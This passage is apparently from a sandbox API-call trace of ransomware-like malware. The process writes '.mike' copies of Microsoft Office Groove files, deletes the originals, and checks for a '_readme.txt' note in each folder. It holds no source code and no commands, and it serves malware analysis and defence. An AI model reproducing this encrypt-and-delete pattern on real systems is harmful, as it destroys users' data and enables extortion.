Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", lpFilePart=0x0) returned 0x71 [0077.301] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", lpFilePart=0x0) returned 0x71 [0077.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 1 [0077.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplate.html")) returned 1 [0077.306] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", lpFilePart=0x0) returned 0x74 [0077.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html", lpFilePart=0x0) returned 0x6f [0077.313] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", lpFilePart=0x0) returned 0x74 [0077.313] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html.mike", lpFilePart=0x0) returned 0x74 [0077.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html", dwFileAttributes=0x80) returned 1 [0077.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplatertl.html")) returned 1 [0077.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.316] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html", lpFilePart=0x0) returned 0x6a [0077.321] WriteFile (in: hFile=0x288, lpBuffer=0x224f2d8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x224f2d8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 1 [0077.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplate.html")) returned 1 [0077.323] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.324] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.324] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", lpFilePart=0x0) returned 0x72 [0077.325] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html", lpFilePart=0x0) returned 0x6d [0077.328] WriteFile (in: hFile=0x288, lpBuffer=0x2260550*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2260550*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.329] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", lpFilePart=0x0) returned 0x72 [0077.329] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html.mike", lpFilePart=0x0) returned 0x72 [0077.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html", dwFileAttributes=0x80) returned 1 [0077.329] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplatertl.html")) returned 1 [0077.330] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.332] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", lpFilePart=0x0) returned 0x74 [0077.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg", lpFilePart=0x0) returned 0x6f [0077.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", lpFilePart=0x0) returned 0x74 [0077.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg.mike", lpFilePart=0x0) returned 0x74 [0077.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsviewattachmenticons.jpg")) returned 1 [0077.338] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.340] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.340] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", lpFilePart=0x0) returned 0x70 [0077.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg", lpFilePart=0x0) returned 0x6b [0077.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", lpFilePart=0x0) returned 0x70 [0077.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg.mike", lpFilePart=0x0) returned 0x70 [0077.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg", dwFileAttributes=0x80) returned 1 [0077.350] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\infopathwelcomeimage.jpg")) returned 1 [0077.351] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.354] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.354] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.354] CoTaskMemFree (pv=0x506980) [0077.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.354] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset", lpFilePart=0x0) returned 0x5a [0077.358] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.358] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", lpFilePart=0x0) returned 0x71 [0077.358] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg", lpFilePart=0x0) returned 0x6c [0077.364] WriteFile (in: hFile=0x288, lpBuffer=0x2138348*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2138348*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.364] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", lpFilePart=0x0) returned 0x71 [0077.365] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg.mike", lpFilePart=0x0) returned 0x71 [0077.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg", dwFileAttributes=0x80) returned 1 [0077.365] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\briefcaseicon.jpg")) returned 1 [0077.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.368] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg", lpFilePart=0x0) returned 0x6a [0077.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\circleicons.jpg")) returned 1 [0077.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg", lpFilePart=0x0) returned 0x6a [0077.383] WriteFile (in: hFile=0x288, lpBuffer=0x2179078*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2179078*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg", dwFileAttributes=0x80) returned 1 [0077.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\meetingicon.jpg")) returned 1 [0077.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.387] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", lpFilePart=0x0) returned 0x76 [0077.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg", lpFilePart=0x0) returned 0x71 [0077.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", lpFilePart=0x0) returned 0x76 [0077.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft 